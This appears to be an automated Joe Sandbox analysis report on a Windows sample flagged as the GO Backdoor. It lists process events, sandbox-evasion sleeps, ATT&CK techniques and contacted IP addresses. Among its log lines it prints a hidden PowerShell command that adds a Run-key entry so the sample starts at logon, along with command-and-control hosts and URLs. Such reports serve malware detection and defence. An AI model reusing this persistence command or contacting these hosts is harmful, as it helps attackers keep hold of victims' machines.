    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2227Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 960Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1430
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 485
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeAPI coverage: 0.0 %
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeAPI coverage: 0.0 %
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeAPI coverage: 0.0 %
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024Thread sleep count: 2227 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024Thread sleep count: 960 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8072Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8044Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508Thread sleep count: 1430 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508Thread sleep count: 485 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2316Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: lDO4WBEQyL.exe, 00000000.00000002.3891639613.000000000082E000.00000004.00000020.00020000.00000000.sdmp, lDO4WBEQyL.exe, 00000006.00000002.3893083631.000000000254A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"Jump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"Jump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\ldo4wbeqyl.exe\" }"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\ldo4wbeqyl.exe\" }"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\ldo4wbeqyl.exe\" }"Jump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\ldo4wbeqyl.exe\" }"Jump to behavior
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeCode function: 0_2_00FB6C50 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FB6C50

    Stealing of Sensitive Information

    barindex
    Yara detected GO Backdoor
    Source: Yara matchFile source: Process Memory Space: lDO4WBEQyL.exe PID: 7328, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected GO Backdoor
    Source: Yara matchFile source: Process Memory Space: lDO4WBEQyL.exe PID: 7328, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Command and Scripting Interpreter    		1
    Registry Run Keys / Startup Folder    		11
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    System Time Discovery    		Remote ServicesData from Local System1
    Non-Standard Port    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell    		1
    DLL Side-Loading    		1
    Registry Run Keys / Startup Folder    		21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Security Software Discovery    		Remote Desktop ProtocolData from Removable Media2
    Non-Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading    		11
    Process Injection    		Security Account Manager1
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS21
    Virtualization/Sandbox Evasion    		Distributed Component Object ModelInput Capture1
    Proxy    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets1
    Application Window Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583035 Sample: lDO4WBEQyL.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 88 24 198.187.3.20.in-addr.arpa 2->24 30 Suricata IDS alerts for network traffic 2->30 32 Antivirus / Scanner detection for submitted sample 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 3 other signatures 2->36 8 lDO4WBEQyL.exe 1 2->8         started        12 lDO4WBEQyL.exe 2->12         started        14 lDO4WBEQyL.exe 2->14         started        signatures3 process4 dnsIp5 26 185.157.213.253, 22132, 59227 TVHORADADAES Spain 8->26 28 46.8.232.106, 59226, 59228, 59229 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics Russian Federation 8->28 38 Suspicious powershell command line found 8->38 40 Found Tor onion address 8->40 16 powershell.exe 1 11 8->16         started        18 powershell.exe 12->18         started        signatures6 process7 process8 20 conhost.exe 16->20         started        22 conhost.exe 18->22         started       

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    lDO4WBEQyL.exe24%VirustotalBrowse
    lDO4WBEQyL.exe37%ReversingLabsWin32.Ransomware.GOBackdoor
    lDO4WBEQyL.exe100%AviraHEUR/AGEN.1316942
    lDO4WBEQyL.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://147.45.196.157http://46.8.232.1060%Avira URL Cloudsafe
    http://147.45.196.157185.157.213.253;22132;hdPotrYMtNLspDL2:4JI/ggA/xcm4fqR6ijq.9ju8LHC.jmQ2AXr36Hj20%Avira URL Cloudsafe
    http://147.45.196.1570%Avira URL Cloudsafe
    http://crl.microL0%Avira URL Cloudsafe
    http://91.212.166.90%Avira URL Cloudsafe
    http://38.180.205.1640%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    198.187.3.20.in-addr.arpa
    		unknown
    		unknownfalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://46.8.232.106/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://147.45.196.157lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2945903417.0000000005A32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://147.45.196.157185.157.213.253;22132;hdPotrYMtNLspDL2:4JI/ggA/xcm4fqR6ijq.9ju8LHC.jmQ2AXr36Hj2lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC40000.00000004.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://147.45.196.157http://46.8.232.106lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC40000.00000004.00001000.00020000.00000000.sdmp, lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://91.212.166.9lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://crl.microLpowershell.exe, 00000008.00000002.3891780842.0000000002AD8000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.3893167157.0000000004AB1000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2943211667.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3893167157.0000000004961000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.3893167157.0000000004AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://46.8.232.106lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2945903417.0000000005A32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://38.180.205.164lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://46.8.236.61lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2943211667.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3893167157.0000000004961000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.3893167157.0000000004AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://91.212.166.91lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  46.8.232.106
                                  		unknownRussian Federation
                                  		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                  185.157.213.253
                                  		unknownSpain
                                  		50129TVHORADADAEStrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1583035
                                  Start date and time:2025-01-01 17:00:20 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 7m 17s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Run name:Run with higher sleep bypass
                                  Number of analysed new started processes analysed:10
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:lDO4WBEQyL.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:43142552e4812e3337226ca1664ed728.exe
                                  Detection:MAL
                                  Classification:mal88.troj.evad.winEXE@9/6@1/2
                                  EGA Information:
                                  • Successful, ratio: 75%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45, 23.1.237.91, 20.3.187.198, 52.149.20.212
                                  • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 7940 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  17:02:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run App C:\Users\user\Desktop\lDO4WBEQyL.exe
                                  17:02:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run App C:\Users\user\Desktop\lDO4WBEQyL.exe

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  46.8.232.106Set-up.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                                  • 46.8.232.106:30001/api/helper-first-register?buildVersion=0dfF.ore2kBf&md5=a64beab5d4516beca4c40b25dc0c1cd8&proxyPassword=dUZKyymJ&proxyUsername=cACUQSOf&userId=GwhkeMIXedr6k95cAje2l7kZetpIxXXDa1K3
                                  reduce.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  iKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou
                                  Week11.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  Week11.exe.bin.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  185.157.213.253Week11.exe.bin.exeGet hashmaliciousGO BackdoorBrowse

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
